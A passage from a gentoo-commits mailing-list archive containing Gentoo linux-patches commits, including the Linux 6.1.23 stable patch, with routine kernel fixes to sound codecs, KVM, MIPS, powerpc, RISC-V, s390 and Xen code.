+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/hdac_hdmi.c b/sound/soc/codecs/hdac_hdmi.c
+index cb23650ad5223..d8e83150ea28e 100644
+--- a/sound/soc/codecs/hdac_hdmi.c
++++ b/sound/soc/codecs/hdac_hdmi.c
+@@ -436,23 +436,28 @@ static int hdac_hdmi_setup_audio_infoframe(struct hdac_device *hdev,
+ 	return 0;
+ }
+ 
+-static int hdac_hdmi_set_tdm_slot(struct snd_soc_dai *dai,
+-		unsigned int tx_mask, unsigned int rx_mask,
+-		int slots, int slot_width)
++static int hdac_hdmi_set_stream(struct snd_soc_dai *dai,
++				void *stream, int direction)
+ {
+ 	struct hdac_hdmi_priv *hdmi = snd_soc_dai_get_drvdata(dai);
+ 	struct hdac_device *hdev = hdmi->hdev;
+ 	struct hdac_hdmi_dai_port_map *dai_map;
+ 	struct hdac_hdmi_pcm *pcm;
++	struct hdac_stream *hstream;
+ 
+-	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, tx_mask);
++	if (!stream)
++		return -EINVAL;
++
++	hstream = (struct hdac_stream *)stream;
++
++	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, hstream->stream_tag);
+ 
+ 	dai_map = &hdmi->dai_map[dai->id];
+ 
+ 	pcm = hdac_hdmi_get_pcm_from_cvt(hdmi, dai_map->cvt);
+ 
+ 	if (pcm)
+-		pcm->stream_tag = (tx_mask << 4);
++		pcm->stream_tag = (hstream->stream_tag << 4);
+ 
+ 	return 0;
+ }
+@@ -1544,7 +1549,7 @@ static const struct snd_soc_dai_ops hdmi_dai_ops = {
+ 	.startup = hdac_hdmi_pcm_open,
+ 	.shutdown = hdac_hdmi_pcm_close,
+ 	.hw_params = hdac_hdmi_set_hw_params,
+-	.set_tdm_slot = hdac_hdmi_set_tdm_slot,
++	.set_stream = hdac_hdmi_set_stream,
+ };
+ 
+ /*
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index 8621cfabcf5b6..1639f3b66facb 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -3667,9 +3667,9 @@ static int __maybe_unused rx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(rx->regmap, true);
+ 	regcache_mark_dirty(rx->regmap);
+ 
+-	clk_disable_unprepare(rx->mclk);
+-	clk_disable_unprepare(rx->npl);
+ 	clk_disable_unprepare(rx->fsgen);
++	clk_disable_unprepare(rx->npl);
++	clk_disable_unprepare(rx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index e5611f655beda..d1d9d8d2df2d2 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -1946,9 +1946,9 @@ static int __maybe_unused tx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(tx->regmap, true);
+ 	regcache_mark_dirty(tx->regmap);
+ 
+-	clk_disable_unprepare(tx->mclk);
+-	clk_disable_unprepare(tx->npl);
+ 	clk_disable_unprepare(tx->fsgen);
++	clk_disable_unprepare(tx->npl);
++	clk_disable_unprepare(tx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index c012033fb69ed..8ed48c86ccb33 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2502,9 +2502,9 @@ static int __maybe_unused wsa_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(wsa->regmap, true);
+ 	regcache_mark_dirty(wsa->regmap);
+ 
+-	clk_disable_unprepare(wsa->mclk);
+-	clk_disable_unprepare(wsa->npl);
+ 	clk_disable_unprepare(wsa->fsgen);
++	clk_disable_unprepare(wsa->npl);
++	clk_disable_unprepare(wsa->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 6eaa18e27e5af..c08f3960ddd96 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -392,6 +392,9 @@ static int sof_ipc4_tx_msg(struct snd_sof_dev *sdev, void *msg_data, size_t msg_
+ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 				 size_t payload_bytes, bool set)
+ {
++	const struct sof_dsp_power_state target_state = {
++			.state = SOF_DSP_PM_D0,
++	};
+ 	size_t payload_limit = sdev->ipc->max_payload_size;
+ 	struct sof_ipc4_msg *ipc4_msg = data;
+ 	struct sof_ipc4_msg tx = {{ 0 }};
+@@ -422,6 +425,11 @@ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 
+ 	tx.extension |= SOF_IPC4_MOD_EXT_MSG_FIRST_BLOCK(1);
+ 
++	/* ensure the DSP is in D0i0 before sending IPC */
++	ret = snd_sof_dsp_set_power_state(sdev, &target_state);
++	if (ret < 0)
++		return ret;
++
+ 	/* Serialise IPC TX */
+ 	mutex_lock(&sdev->ipc->tx_mutex);
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 56102711f395a..80a15a6802094 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1011,7 +1011,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	if (is_struct)
+ 		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+-	if (vlen)
++	/*
++	 * Keep `struct empty {}` on a single line,
++	 * only print newline when there are regular or padding fields.
++	 */
++	if (vlen || t->size)
+ 		btf_dump_printf(d, "\n");
+ 	btf_dump_printf(d, "%s}", pfx(lvl));
+ 	if (packed)
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 2e91973fbaa66..aceb6011315c2 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -172,11 +172,11 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 
+ 		if (!MAPLE_32BIT) {
+ 			if (i >= 35)
+-				e = i - 35;
++				e = i - 34;
+ 			else if (i >= 5)
+-				e = i - 5;
++				e = i - 4;
+ 			else if (i >= 2)
+-				e = i - 2;
++				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+ 				e = i - 4;
+@@ -304,17 +304,17 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	mn = mas_pop_node(&mas); /* get the next node. */
+ 	MT_BUG_ON(mt, mn == NULL);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 2);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
+ 
+ 	mas_push_node(&mas, mn);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	/* Check the limit of pop/push/pop */
+ 	mas_node_count(&mas, MAPLE_ALLOC_SLOTS + 2); /* Request */
+@@ -322,14 +322,14 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_alloc_req(&mas));
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS);
+ 	mas_push_node(&mas, mn);
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-06 10:41 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-06 10:41 UTC (permalink / raw
  To: gentoo-commits

commit:     f97107ed670fe757007eb080b0b2accc643d82f2
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr  6 10:40:48 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr  6 10:40:48 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f97107ed

Linux patch 6.1.23

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |     4 +
 1022_linux-6.1.23.patch | 10192 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10196 insertions(+)

diff --git a/0000_README b/0000_README
index dac87a0b..82189ada 100644
--- a/0000_README
+++ b/0000_README
@@ -131,6 +131,10 @@ Patch:  1021_linux-6.1.22.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.22
 
+Patch:  1022_linux-6.1.23.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.23
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1022_linux-6.1.23.patch b/1022_linux-6.1.23.patch
new file mode 100644
index 00000000..885f13e9
--- /dev/null
+++ b/1022_linux-6.1.23.patch
@@ -0,0 +1,10192 @@
+diff --git a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+index 7149784a36ac7..3ee77af5a74cf 100644
+--- a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
++++ b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+@@ -84,6 +84,13 @@ patternProperties:
+   "^otp(-[0-9]+)?$":
+     type: object
+ 
++  spi-cpol: true
++  spi-cpha: true
++
++dependencies:
++  spi-cpol: [ spi-cpha ]
++  spi-cpha: [ spi-cpol ]
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Makefile b/Makefile
+index c3d44de8850cf..a162f6cdf77c6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 22
++SUBLEVEL = 23
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index fcc890e3ad735..f11feb98fde33 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -244,7 +244,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index 4879da4cdbd25..77a3a27b04e26 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -220,7 +220,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm64/kernel/efi-header.S b/arch/arm64/kernel/efi-header.S
+index 28d8a5dca5f12..d731b4655df8e 100644
+--- a/arch/arm64/kernel/efi-header.S
++++ b/arch/arm64/kernel/efi-header.S
+@@ -66,7 +66,7 @@
+ 	.long	.Lefi_header_end - .L_head		// SizeOfHeaders
+ 	.long	0					// CheckSum
+ 	.short	IMAGE_SUBSYSTEM_EFI_APPLICATION		// Subsystem
+-	.short	0					// DllCharacteristics
++	.short	IMAGE_DLL_CHARACTERISTICS_NX_COMPAT	// DllCharacteristics
+ 	.quad	0					// SizeOfStackReserve
+ 	.quad	0					// SizeOfStackCommit
+ 	.quad	0					// SizeOfHeapReserve
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 2c3759f1f2c56..019472dd98ff7 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -646,14 +646,33 @@ static int get_user_mapping_size(struct kvm *kvm, u64 addr)
+ 				   CONFIG_PGTABLE_LEVELS),
+ 		.mm_ops		= &kvm_user_mm_ops,
+ 	};
++	unsigned long flags;
+ 	kvm_pte_t pte = 0;	/* Keep GCC quiet... */
+ 	u32 level = ~0;
+ 	int ret;
+ 
++	/*
++	 * Disable IRQs so that we hazard against a concurrent
++	 * teardown of the userspace page tables (which relies on
++	 * IPI-ing threads).
++	 */
++	local_irq_save(flags);
+ 	ret = kvm_pgtable_get_leaf(&pgt, addr, &pte, &level);
+-	VM_BUG_ON(ret);
+-	VM_BUG_ON(level >= KVM_PGTABLE_MAX_LEVELS);
+-	VM_BUG_ON(!(pte & PTE_VALID));
++	local_irq_restore(flags);
++
++	if (ret)
++		return ret;
++
++	/*
++	 * Not seeing an error, but not updating level? Something went
++	 * deeply wrong...
++	 */
++	if (WARN_ON(level >= KVM_PGTABLE_MAX_LEVELS))
++		return -EFAULT;
++
++	/* Oops, the userspace PTs are gone... Replay the fault */
++	if (!kvm_pte_valid(pte))
++		return -EAGAIN;
+ 
+ 	return BIT(ARM64_HW_PGTABLE_LEVEL_SHIFT(level));
+ }
+@@ -1006,7 +1025,7 @@ static bool fault_supports_stage2_huge_mapping(struct kvm_memory_slot *memslot,
+  *
+  * Returns the size of the mapping.
+  */
+-static unsigned long
++static long
+ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 			    unsigned long hva, kvm_pfn_t *pfnp,
+ 			    phys_addr_t *ipap)
+@@ -1018,8 +1037,15 @@ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 	 * sure that the HVA and IPA are sufficiently aligned and that the
+ 	 * block map is contained within the memslot.
+ 	 */
+-	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE) &&
+-	    get_user_mapping_size(kvm, hva) >= PMD_SIZE) {
++	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE)) {
++		int sz = get_user_mapping_size(kvm, hva);
++
++		if (sz < 0)
++			return sz;
++
++		if (sz < PMD_SIZE)
++			return PAGE_SIZE;
++
+ 		/*
+ 		 * The address we faulted on is backed by a transparent huge
+ 		 * page.  However, because we map the compound huge page and
+@@ -1138,7 +1164,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 	bool logging_active = memslot_is_logging(memslot);
+ 	bool use_read_lock = false;
+ 	unsigned long fault_level = kvm_vcpu_trap_get_fault_level(vcpu);
+-	unsigned long vma_pagesize, fault_granule;
++	long vma_pagesize, fault_granule;
+ 	enum kvm_pgtable_prot prot = KVM_PGTABLE_PROT_R;
+ 	struct kvm_pgtable *pgt;
+ 
+@@ -1295,6 +1321,11 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 			vma_pagesize = transparent_hugepage_adjust(kvm, memslot,
+ 								   hva, &pfn,
+ 								   &fault_ipa);
++
++		if (vma_pagesize < 0) {
++			ret = vma_pagesize;
++			goto out_unlock;
++		}
+ 	}
+ 
+ 	if (fault_status != FSC_PERM && !device && kvm_has_mte(kvm)) {
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index f4a7c5abcbca4..bfe4f17232b3e 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -767,6 +767,22 @@ static bool pmu_counter_idx_valid(struct kvm_vcpu *vcpu, u64 idx)
+ 	return true;
+ }
+ 
++static int get_pmu_evcntr(struct kvm_vcpu *vcpu, const struct sys_reg_desc *r,
++			  u64 *val)
++{
++	u64 idx;
++
++	if (r->CRn == 9 && r->CRm == 13 && r->Op2 == 0)
++		/* PMCCNTR_EL0 */
++		idx = ARMV8_PMU_CYCLE_IDX;
++	else
++		/* PMEVCNTRn_EL0 */
++		idx = ((r->CRm & 3) << 3) | (r->Op2 & 7);
++
++	*val = kvm_pmu_get_counter_value(vcpu, idx);
++	return 0;
++}
++
+ static bool access_pmu_evcntr(struct kvm_vcpu *vcpu,
+ 			      struct sys_reg_params *p,
+ 			      const struct sys_reg_desc *r)
+@@ -983,7 +999,7 @@ static bool access_pmuserenr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ /* Macro to expand the PMEVCNTRn_EL0 register */
+ #define PMU_PMEVCNTR_EL0(n)						\
+ 	{ PMU_SYS_REG(SYS_PMEVCNTRn_EL0(n)),				\
+-	  .reset = reset_pmevcntr,					\
++	  .reset = reset_pmevcntr, .get_user = get_pmu_evcntr,		\
+ 	  .access = access_pmu_evcntr, .reg = (PMEVCNTR0_EL0 + n), }
+ 
+ /* Macro to expand the PMEVTYPERn_EL0 register */
+@@ -1632,7 +1648,8 @@ static const struct sys_reg_desc sys_reg_descs[] = {
+ 	{ PMU_SYS_REG(SYS_PMCEID1_EL0),
+ 	  .access = access_pmceid, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMCCNTR_EL0),
+-	  .access = access_pmu_evcntr, .reset = reset_unknown, .reg = PMCCNTR_EL0 },
++	  .access = access_pmu_evcntr, .reset = reset_unknown,
++	  .reg = PMCCNTR_EL0, .get_user = get_pmu_evcntr},
+ 	{ PMU_SYS_REG(SYS_PMXEVTYPER_EL0),
+ 	  .access = access_pmu_evtyper, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMXEVCNTR_EL0),
+diff --git a/arch/mips/bmips/dma.c b/arch/mips/bmips/dma.c
+index 33788668cbdbf..3779e7855bd75 100644
+--- a/arch/mips/bmips/dma.c
++++ b/arch/mips/bmips/dma.c
+@@ -5,6 +5,8 @@
+ #include <asm/bmips.h>
+ #include <asm/io.h>
+ 
++bool bmips_rac_flush_disable;
++
+ void arch_sync_dma_for_cpu_all(void)
+ {
+ 	void __iomem *cbr = BMIPS_GET_CBR();
+@@ -15,6 +17,9 @@ void arch_sync_dma_for_cpu_all(void)
+ 	    boot_cpu_type() != CPU_BMIPS4380)
+ 		return;
+ 
++	if (unlikely(bmips_rac_flush_disable))
++		return;
++
+ 	/* Flush stale data out of the readahead cache */
+ 	cfg = __raw_readl(cbr + BMIPS_RAC_CONFIG);
+ 	__raw_writel(cfg | 0x100, cbr + BMIPS_RAC_CONFIG);
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index e95b3f78e7cd4..549a6392a3d2d 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -35,6 +35,8 @@
+ #define REG_BCM6328_OTP		((void __iomem *)CKSEG1ADDR(0x1000062c))
+ #define BCM6328_TP1_DISABLED	BIT(9)
+ 
++extern bool bmips_rac_flush_disable;
++
+ static const unsigned long kbase = VMLINUX_LOAD_ADDRESS & 0xfff00000;
+ 
+ struct bmips_quirk {
+@@ -104,6 +106,12 @@ static void bcm6358_quirks(void)
+ 	 * disable SMP for now
+ 	 */
+ 	bmips_smp_enabled = 0;
++
++	/*
++	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
++	 * because the bootloader is not initializing it properly.
++	 */
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/powerpc/include/asm/book3s/64/tlbflush.h b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+index 67655cd605456..985bd8e69bdc2 100644
+--- a/arch/powerpc/include/asm/book3s/64/tlbflush.h
++++ b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+@@ -163,6 +163,11 @@ static inline void flush_tlb_fix_spurious_fault(struct vm_area_struct *vma,
+ 	 */
+ }
+ 
++static inline bool __pte_protnone(unsigned long pte)
++{
++	return (pte & (pgprot_val(PAGE_NONE) | _PAGE_RWX)) == pgprot_val(PAGE_NONE);
++}
++
+ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 					  unsigned long newval)
+ {
+@@ -179,8 +184,8 @@ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 	/*
+ 	 * We do not expect kernel mappings or non-PTEs or not-present PTEs.
+ 	 */
+-	VM_WARN_ON_ONCE(oldval & _PAGE_PRIVILEGED);
+-	VM_WARN_ON_ONCE(newval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(oldval) && oldval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(newval) && newval & _PAGE_PRIVILEGED);
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(newval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PRESENT));
+diff --git a/arch/powerpc/kernel/ptrace/ptrace-view.c b/arch/powerpc/kernel/ptrace/ptrace-view.c
+index 076d867412c70..31876db8e996f 100644
+--- a/arch/powerpc/kernel/ptrace/ptrace-view.c
++++ b/arch/powerpc/kernel/ptrace/ptrace-view.c
+@@ -290,6 +290,9 @@ static int gpr_set(struct task_struct *target, const struct user_regset *regset,
+ static int ppr_get(struct task_struct *target, const struct user_regset *regset,
+ 		   struct membuf to)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return membuf_write(&to, &target->thread.regs->ppr, sizeof(u64));
+ }
+ 
+@@ -297,6 +300,9 @@ static int ppr_set(struct task_struct *target, const struct user_regset *regset,
+ 		   unsigned int pos, unsigned int count, const void *kbuf,
+ 		   const void __user *ubuf)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return user_regset_copyin(&pos, &count, &kbuf, &ubuf,
+ 				  &target->thread.regs->ppr, 0, sizeof(u64));
+ }
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 4ad6e510d405f..94c023bb13e05 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -857,6 +857,13 @@ int pseries_vas_dlpar_cpu(void)
+ {
+ 	int new_nr_creds, rc;
+ 
++	/*
++	 * NX-GZIP is not enabled. Nothing to do for DLPAR event
++	 */
++	if (!copypaste_feat)
++		return 0;
++
++
+ 	rc = h_query_vas_capabilities(H_QUERY_VAS_CAPABILITIES,
+ 				      vascaps[VAS_GZIP_DEF_FEAT_TYPE].feat,
+ 				      (u64)virt_to_phys(&hv_cop_caps));
+@@ -1013,6 +1020,7 @@ static int __init pseries_vas_init(void)
+ 	 * Linux supports user space COPY/PASTE only with Radix
+ 	 */
+ 	if (!radix_enabled()) {
++		copypaste_feat = false;
+ 		pr_err("API is supported only with radix page tables\n");
+ 		return -ENOTSUPP;
+ 	}
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index ae11d5647f9d4..06b9b2f60b9fb 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -278,7 +278,7 @@ config ARCH_RV64I
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS if HAVE_DYNAMIC_FTRACE
+ 	select HAVE_FTRACE_MCOUNT_RECORD if !XIP_KERNEL
+ 	select HAVE_FUNCTION_GRAPH_TRACER
+-	select HAVE_FUNCTION_TRACER if !XIP_KERNEL
++	select HAVE_FUNCTION_TRACER if !XIP_KERNEL && !PREEMPTION
+ 	select SWIOTLB if MMU
+ 
+ endchoice
+diff --git a/arch/riscv/kvm/vcpu_timer.c b/arch/riscv/kvm/vcpu_timer.c
+index ad34519c8a13d..3ac2ff6a65dac 100644
+--- a/arch/riscv/kvm/vcpu_timer.c
++++ b/arch/riscv/kvm/vcpu_timer.c
+@@ -147,10 +147,8 @@ static void kvm_riscv_vcpu_timer_blocking(struct kvm_vcpu *vcpu)
+ 		return;
+ 
+ 	delta_ns = kvm_riscv_delta_cycles2ns(t->next_cycles, gt, t);
+-	if (delta_ns) {
+-		hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
+-		t->next_set = true;
+-	}
++	hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
++	t->next_set = true;
+ }
+ 
+ static void kvm_riscv_vcpu_timer_unblocking(struct kvm_vcpu *vcpu)
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
+index b3235ab0ace83..ed646c583e4fe 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -162,7 +162,7 @@ vdso_prepare: prepare0
+ 
+ ifdef CONFIG_EXPOLINE_EXTERN
+ modules_prepare: expoline_prepare
+-expoline_prepare:
++expoline_prepare: scripts
+ 	$(Q)$(MAKE) $(build)=arch/s390/lib/expoline arch/s390/lib/expoline/expoline.o
+ endif
+ endif
+diff --git a/arch/s390/lib/uaccess.c b/arch/s390/lib/uaccess.c
+index 720036fb19242..d44214072779e 100644
+--- a/arch/s390/lib/uaccess.c
++++ b/arch/s390/lib/uaccess.c
+@@ -172,7 +172,7 @@ unsigned long __clear_user(void __user *to, unsigned long size)
+ 		"4: slgr  %0,%0\n"
+ 		"5:\n"
+ 		EX_TABLE(0b,2b) EX_TABLE(6b,2b) EX_TABLE(3b,5b) EX_TABLE(7b,5b)
+-		: "+a" (size), "+a" (to), "+a" (tmp1), "=a" (tmp2)
++		: "+&a" (size), "+&a" (to), "+a" (tmp1), "=&a" (tmp2)
+ 		: "a" (empty_zero_page), [spec] "d" (spec.val)
+ 		: "cc", "memory", "0");
+ 	return size;
+diff --git a/arch/x86/xen/Makefile b/arch/x86/xen/Makefile
+index 3c5b52fbe4a7f..a9ec8c9f5c5dd 100644
+--- a/arch/x86/xen/Makefile
++++ b/arch/x86/xen/Makefile
+@@ -45,6 +45,6 @@ obj-$(CONFIG_PARAVIRT_SPINLOCKS)+= spinlock.o
+ 
+ obj-$(CONFIG_XEN_DEBUG_FS)	+= debugfs.o
+ 
+-obj-$(CONFIG_XEN_PV_DOM0)	+= vga.o
++obj-$(CONFIG_XEN_DOM0)		+= vga.o
+ 
+ obj-$(CONFIG_XEN_EFI)		+= efi.o
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 8944726255c9c..333539bdbdaae 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1389,7 +1389,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 
+ 		x86_platform.set_legacy_features =
+ 				xen_dom0_set_legacy_features;
+-		xen_init_vga(info, xen_start_info->console.dom0.info_size);
++		xen_init_vga(info, xen_start_info->console.dom0.info_size,
++			     &boot_params.screen_info);
+ 		xen_start_info->console.domU.mfn = 0;
+ 		xen_start_info->console.domU.evtchn = 0;
+ 
+diff --git a/arch/x86/xen/enlighten_pvh.c b/arch/x86/xen/enlighten_pvh.c
+index bcae606bbc5cf..ada3868c02c23 100644
+--- a/arch/x86/xen/enlighten_pvh.c
++++ b/arch/x86/xen/enlighten_pvh.c
+@@ -43,6 +43,19 @@ void __init xen_pvh_init(struct boot_params *boot_params)
+ 	x86_init.oem.banner = xen_banner;
+ 
+ 	xen_efi_init(boot_params);
++
